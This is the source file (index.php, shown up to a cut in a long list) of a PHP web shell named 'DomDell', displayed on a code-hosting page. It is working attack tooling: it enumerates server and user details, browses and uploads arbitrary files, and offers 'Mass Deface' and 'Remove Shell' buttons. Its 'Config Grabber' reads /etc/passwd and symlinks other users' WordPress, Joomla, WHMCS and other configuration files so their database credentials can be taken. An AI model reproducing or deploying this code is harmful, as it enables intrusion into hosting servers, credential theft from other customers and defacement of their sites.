-
Notifications
You must be signed in to change notification settings - Fork 1
/
index.php
1296 lines (1205 loc) · 82.4 KB
/
index.php
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
895
896
897
898
899
900
901
902
903
904
905
906
907
908
909
910
911
912
913
914
915
916
917
918
919
920
921
922
923
924
925
926
927
928
929
930
931
932
933
934
935
936
937
938
939
940
941
942
943
944
945
946
947
948
949
950
951
952
953
954
955
956
957
958
959
960
961
962
963
964
965
966
967
968
969
970
971
972
973
974
975
976
977
978
979
980
981
982
983
984
985
986
987
988
989
990
991
992
993
994
995
996
997
998
999
1000
<?php
$free = disk_free_space("/") / 1073741824;
$total = disk_total_space("/") / 1073741824;
function RealIp()
{
if (!empty($_SERVER['HTTP_CLIENT_IP'])) {
$ip = $_SERVER['HTTP_CLIENT_IP'];
} elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
$ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
} else {
$ip = $_SERVER['REMOTE_ADDR'];
}
return $ip;
};
if (isset($_POST['mkdir'])) {
if (isset($_GET['path'])) {
if (mkdir($_GET['path'] . "/" . $_POST['mkdir'])) {
$createFolder = "Create Folder has been successful";
} else {
$createFolder = "We Can not Create Folder";
}
} else {
if (mkdir($_POST['mkdir'])) {
$createFolder = "Create Folder has been successful";
} else {
$createFolder = "We Can not Create Folder";
}
}
}
if (isset($_POST['file'])) {
if (isset($_GET['path'])) {
if (touch($_GET['path'] . "/" . $_POST['file'])) {
$createFile = "Create File has been successful";
} else {
$createFile = "We Can not Create File";
}
} else {
if (touch($_POST['file'])) {
$createFile = "Create File has been successful";
} else {
$createFile = "We Can not Create File";
}
}
}
?>
<!DOCTYPE html>
<html>
<head>
<title>DomDell</title>
<link rel="icon" href="https://ibb.co/C8S7787">
</head>
<link href="https://fonts.googleapis.com/css?family=Quicksand" rel="stylesheet">
<link rel="preconnect" href="https://fonts.googleapis.com">
<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
<link href="https://fonts.googleapis.com/css2?family=Oswald:wght@200&display=swap" rel="stylesheet">
<style>
@import url('https://fonts.googleapis.com/css2?family=Raleway:wght@500&display=swap');
body {
/* background: rgb(2,1,19); */
background: linear-gradient(90deg, rgba(2, 1, 19, 1) 0%, rgba(4, 25, 29, 1) 100%);
background-repeat: no-repeat;
background-size: cover;
object-fit: cover;
font-family: 'Raleway', sans-serif;
}
.btn {
display: inline-block;
padding: 0.35em 1.2em;
border: 0.1em solid #FFFFFF;
margin: 0 0.3em 0.3em 0;
border-radius: 0.12em;
box-sizing: border-box;
text-decoration: none;
font-weight: 300;
color: white;
text-align: center;
transition: all 0.2s;
background-color: rgb(1, 4, 6);
background: transparent;
}
.btn:hover {
color: #000000;
background-color: #FFFFFF;
}
* {
color: white;
/* font-family: 'Nunito', sans-serif; */
}
.ip {
position: absolute;
top: 0px;
right: 0px;
}
.Server {
position: absolute;
top: 20px;
right: 0px;
}
.tools {
color: black;
background-color: rgb(17, 20, 23);
height: 115px;
}
.tool {
display: inline-block;
padding: 0.35em 1.2em;
border: 0.1em solid #FFFFFF;
margin: 0 0.3em 0.3em 0;
border-radius: 0.12em;
box-sizing: border-box;
text-decoration: none;
font-family: 'Roboto', sans-serif;
font-weight: 300;
color: white;
text-align: center;
transition: all 0.2s;
background-color: rgb(1, 4, 6);
height: 50px;
}
.tool:hover {
color: #000000;
background-color: #FFFFFF;
}
li {
list-style: none;
list-style-type: none;
display: inline-block;
padding: 13px;
font-size: 18px;
margin-right: 83px;
opacity: 1;
margin-top: 20px;
border-radius: 30%;
}
span {
color: white;
}
a {
text-decoration: none;
color: white;
}
input {
border: 2px solid white;
padding: 5px 1px;
font-size: 15px;
border-radius: 5%;
}
textarea {
color: white;
background-color: rgba(128, 128, 128, 0.11);
border-radius: 3%;
border: 1px solid blue;
}
option,
select {
font-size: 15px;
border: 1px solid blue;
}
table,
tr {
border: 5px solid rgba(128, 128, 128, 0.11);
font-size: 15px;
}
.wrapper {
width: 800px;
height: 50vh;
margin: 0 auto;
display: flex;
align-items: center;
justify-content: center;
}
.cmd {
position: relative;
display: block;
height: 300px;
width: 100%;
border: 1px solid #000000;
border-radius: 4px;
overflow: hidden;
box-shadow: 0px 8px 18px #4b1d3f;
}
.title-bar {
position: absolute;
top: 0;
left: 0;
right: 0;
width: 100%;
height: 40px;
display: block;
color: #FFFFFF;
line-height: 40px;
font-weight: 600;
background-color: #242424;
text-align: center;
}
.tool-bar {
position: absolute;
top: 40px;
left: 0;
right: 0;
display: block;
width: 100%;
height: 30px;
line-height: 30px;
background-color: #242424;
}
.tool-bar ul {
list-style-type: none;
margin: 0px;
padding: 0px;
}
.tool-bar ul li {
display: inline-block;
margin: 0;
padding: 0;
}
.tool-bar ul li a {
padding: 0px 6px;
text-decoration: none;
color: #FFFFFF;
}
.tool-bar ul li a:hover {
text-decoration: underline;
}
.textarea {
color: black;
position: relative;
top: 70px;
padding: 12px;
resize: none;
width: 100%;
height: calc(100% - 70px);
background-color: #4b1d3f;
border: none;
color: #FFFFFF;
margin: 0px;
font-size: 1.1rem;
}
.mkdir {
display: inline-block;
width: 900px;
padding: 70px;
}
.file {
display: inline-block;
padding: 40px;
}
.btnfilesys {
color: black;
}
.selectFile {
color: black;
}
option {
color: black;
}
.home {
color: black;
}
.createFolder {
border: 2px solid white;
background-color: grey;
}
</style>
<body>
<?php ?>
<?php echo "<span style='color:white'> Uname : </span>" . "<span>" . php_uname() . "</span>"; ?><br />
<?php echo "<span style='color:white'>Server : </span>" . "<span>" . $_SERVER['SERVER_SOFTWARE'] . "</span>" ?><br />
<?php echo "<span style='color:white'>Whoami : </span>" . "<span>" . get_current_user() . "</span>" ?><br />
<?php echo "<span style='color:white'>Safe Mode : </span>";
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode") == "on")) {
echo "<span>ON</span>";
} else {
echo "<span>OFF</span>";
}
echo "<br/>";
echo "<span style='color:white'> DOCUMENT ROOT : </span>" . "<span style='font-weight:bold;color:red'>" . $_SERVER['DOCUMENT_ROOT'] . "</span>";
echo "</br>";
echo "<span style='color:white'>Disable Function : </span>";
$disableFunction = @ini_get('disable_functions');
$arr = explode(',', $disableFunction);
foreach ($arr as $fun) {
echo "<span style='#6666ff'>" . $fun . "</span>";
}
echo "<br/>";
echo "<span style='color:black'> Path : </span>";
if (isset($_GET['path'])) {
$path = $_GET['path'];
} else {
$path = getcwd();
}
$path = str_replace('\\', '/', $path);
$paths = explode('/', $path);
foreach ($paths as $id => $pat) {
if ($pat == '' && $id == 0) {
$a = true;
echo '<a href="?path=/">/</a>';
continue;
}
if ($pat == '') continue;
echo '<a href="?path=';
for ($i = 0; $i <= $id; $i++) {
echo "$paths[$i]";
if ($i != $id) echo "/";
}
echo '">' . $pat . '</a>/';
}
?>
<br />
<br />
<form method="post" enctype="multipart/form-data">
<input type="file" name="Upload">
<input type="submit" name="Load" value="Upload">
</form>
<?php
$fileupload = @$_FILES['Upload'];
if (isset($_POST['Load'])) {
if (isset($_GET['path'])) {
if (isset($fileupload['name'])) {
move_uploaded_file($fileupload['tmp_name'], $_GET['path'] . "/" . $fileupload['name']);
echo "Upload Has Been Successful";
}
}
} else {
if (isset($fileupload['name'])) {
move_uploaded_file($fileupload['tmp_name'], $fileupload['name']);
echo "Upload Has Been Successful";
}
}
?>
<span class="Server"><?php echo "<span>Server IP : </span>" . "<span>" . $_SERVER['SERVER_ADDR'] . "</span>"; ?></span>
<span class="ip"><?php echo "<span> Client IP : </span>" . "<span>" . RealIp() . "</span>"; ?></span>
<div class="tools">
<ul>
<li><a style="color:white" href="<?php echo basename($_SERVER['SCRIPT_FILENAME']); ?>">Home</a></li>
<form method="post" style="display: inline;">
<li><input class="tool" name="done" type="submit" value="Config Grabber"></li>
</form>
<form method="post" style="display: inline-block;">
<li><input class="tool" name="us" type="submit" value="Users"></li>
</form>
<form method="post" style="display: inline-block;">
<li><input class="tool" type="submit" name="mass" value="Mass Deface"></li>
</form>
<form method="post" style="display: inline-block;">
<li>
<input class="tool" type="submit" name="delet" value="Remove Shell">
</li>
<form method="post" style="display: inline-block;">
<li>
<input class="tool" type="submit" name="cgi" value="CGI">
</li>
</form>
</ul>
</form>
</div>
<?php
if (isset($_POST['done'])) {
if (strtoupper(substr(php_uname(), 0, 3)) === 'WIN') {
echo '<center>This is a server using Windows!</center>';
} else {
?>
<br />
<br />
<form method="post">
<center>
<div class="wrapper">
<div class="cmd">
<div class="title-bar">DomDell@shell~</div>
<div class="tool-bar">
</div>
<textarea class="textarea" name="config" style="color: white; background-color: rgba(128, 128, 128, 0.11); border: 1px solid blue; border-radius: 3%" cols="70" rows="30"><?php $etc = file('/etc/passwd');
foreach ($etc as $config) {
echo $config;
}
?>
</textarea>
</div>
</div>
<textarea hidden name="config2"><?php $etc2 = file('/etc/passwd');
foreach ($etc as $config2) {
$str = explode(":", $config2);
echo $str[0] . "\n";
}
?>
</textarea>
<br />
<select class="home" name="home">
<option value="home">home</option>
<option value="home1">home1</option>
<option value="home2">home2</option>
<option value="home3">home3</option>
<option value="home4">home4</option>
<option value="home5">home5</option>
<option value="home6">home6</option>
</select>
<br><br><br>
<input style="color: white; background-color: black; border: 1px solid blue" type="submit" name="send" value='Grab ?'>
</center>
</form>
<?php }
} ?>
<?php
if (isset($_POST['send'])) {
if (isset($_GET['path'])) {
if (file_exists("DomDell_Config")) {
echo "<center>";
echo "<br/>";
echo "<a href='DomDell_Config'>Configuration Files</a>";
echo "</center>";
} else {
$dir = mkdir($_GET['path'] . "/DomDell_Config", 0777);
$usr = explode("\n", $_POST['config2']);
foreach ($usr as $uss) {
$us = trim($uss);
$r = $_GET['path'] . "/DomDell_Config/";
symlink("/" . $_POST['home'] . "/" . $us . "/" . "config.php", $r . $us . "config.php");
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/admin/inc/config.php', $r . $us . '..wp-config');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/admin/include/config.php', $r . $us . '..wp-config');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/inc/config.php', $r . $us . '..wp-config');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/include/config.php', $r . $us . '..wp-config');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/admin/configuration/config.php', $r . $us . '..wp-config');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/admin/conf/config.php', $r . $us . '..wp-config');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/admin/connect/config.php', $r . $us . '..wp-config');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/connect/config.php', $r . $us . '..wp-config');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/admin/configuration/config.php', $r . $us . '..wp-config');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/admin/db/config.php', $r . $us . '..wp-config');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/wp-config.php', $r . $us . '..wp-config');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/wordpress/wp-config.php', $r . $us . '..word-wp');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/blog/wp-config.php', $r . $us . '..wpblog');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/configuration.php', $r . $us . '..joomla-or-whmcs');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/joomla/configuration.php', $r . $us . '..joomla');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/vb/includes/config.php', $r . $us . '..vbinc');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/includes/config.php', $r . $us . '..vb');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/conf_global.php', $r . $us . '..conf_global');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/inc/config.php', $r . $us . '..inc');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/config.php', $r . $us . '..config');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/Settings.php', $r . $us . '..Settings');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/sites/default/settings.php', $r . $us . '..sites');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/whm/configuration.php', $r . $us . '..whm');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/whmcs/configuration.php', $r . $us . '..whmcs');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/support/configuration.php', $r . $us . '..supporwhmcs');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/whmc/WHM/configuration.php', $r . $us . '..WHM');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/whm/WHMCS/configuration.php', $r . $us . '..whmc');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/whm/whmcs/configuration.php', $r . $us . '..WHMcs');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/support/configuration.php', $r . $us . '..whmcsupp');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/clients/configuration.php', $r . $us . '..whmcs-cli');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/client/configuration.php', $r . $us . '..whmcs-cl');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/clientes/configuration.php', $r . $us . '..whmcs-CL');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/cliente/configuration.php', $r . $us . '..whmcs-Cl');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/clientsupport/configuration.php', $r . $us . '..whmcs-csup');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/billing/configuration.php', $r . $us . '..whmcs-bill');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/admin/config.php', $r . $us . '..admin-conf');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/config/koneksi.php', $r . $us . '..Lokomedia');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/forum/config.php', $r . $us . '..phpBB');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/sites/default/settings.php', $r . $us . '..Drupal');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/config/settings.inc.php', $r . $us . '..PrestaShop');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/app/etc/local.xml', $r . $us . '..Magento');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/application/config/database.php', $r . $us . '..Ellislab');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/vb/includes/config.php', $r . $us . '..Vbulletin');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/includes/config.php', $r . $us . '..Vbulletin');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/forum/includes/config.php', $r . $us . '..Vbulletin');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/forums/includes/config.php', $r . $us . '..Vbulletin');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/cc/includes/config.php', $r . $us . '..Vbulletin');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/inc/config.php', $r . $us . '..MyBB');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/includes/configure.php', $r . $us . '..OsCommerce');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/shop/includes/configure.php', $r . $us . '..OsCommerce');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/os/includes/configure.php', $r . $us . '..OsCommerce');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/oscom/includes/configure.php', $r . $us . '..OsCommerce');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/products/includes/configure.php', $r . $us . '..OsCommerce');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/cart/includes/configure.php', $r . $us . '..OsCommerce');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/inc/conf_global.php', $r . $us . '..IPB');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/wp/test/wp-config.php', $r . $us . '..Wordpress');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/blog/wp-config.php', $r . $us . '..Wordpress');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/beta/wp-config.php', $r . $us . '..Wordpress');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/portal/wp-config.php', $r . $us . '..Wordpress');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/site/wp-config.php', $r . $us . '..Wordpress');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/wp/wp-config.php', $r . $us . '..Wordpress');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/WP/wp-config.php', $r . $us . '..Wordpress');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/news/wp-config.php', $r . $us . '..Wordpress');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/wordpress/wp-config.php', $r . $us . '..Wordpress');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/test/wp-config.php', $r . $us . '..Wordpress');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/demo/wp-config.php', $r . $us . '..Wordpress');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/home/wp-config.php', $r . $us . '..Wordpress');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/v1/wp-config.php', $r . $us . '..Wordpress');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/v2/wp-config.php', $r . $us . '..Wordpress');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/press/wp-config.php', $r . $us . '..Wordpress');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/new/wp-config.php', $r . $us . '..Wordpress');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/blogs/wp-config.php', $r . $us . '..Wordpress');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/configuration.php', $r . $us . '..Joomla');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/blog/configuration.php', $r . $us . '..Joomla');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/cms/configuration.php', $r . $us . '..Joomla');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/beta/configuration.php', $r . $us . '..Joomla');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/portal/configuration.php', $r . $us . '..Joomla');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/site/configuration.php', $r . $us . '..Joomla');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/main/configuration.php', $r . $us . '..Joomla');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/home/configuration.php', $r . $us . '..Joomla');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/demo/configuration.php', $r . $us . '..Joomla');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/test/configuration.php', $r . $us . '..Joomla');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/v1/configuration.php', $r . $us . '..Joomla');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/v2/configuration.php', $r . $us . '..Joomla');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/joomla/configuration.php', $r . $us . '..Joomla');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/new/configuration.php', $r . $us . '..Joomla');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/WHMCS/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/whmcs1/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/Whmcs/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/whmcs/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/whmcs/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/WHMC/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/Whmc/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/whmc/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/WHM/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/Whm/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/whm/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/HOST/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/Host/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/host/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/SUPPORTES/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/Supportes/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/supportes/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/domains/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/domain/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/Hosting/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/HOSTING/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/hosting/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/CART/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/Cart/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/cart/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/ORDER/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/Order/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/order/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/CLIENT/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/Client/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/client/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/CLIENTAREA/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/Clientarea/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/clientarea/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/SUPPORT/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/Support/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/support/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/BILLING/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/Billing/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/billing/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/BUY/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/Buy/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/buy/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/MANAGE/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/Manage/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/manage/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/CLIENTSUPPORT/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/ClientSupport/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/Clientsupport/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/clientsupport/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/CHECKOUT/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/Checkout/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/checkout/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/BILLINGS/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/Billings/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/billings/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/BASKET/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/Basket/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/basket/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/SECURE/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/Secure/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/secure/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/SALES/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/Sales/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/sales/submitticket.php', $r . $us . '..WHMCS');
symlink("/" . $_POST['home'] . "/" . $us . '/public_html/BILL/submitticket.php', $r . $us . '..WHMCS');
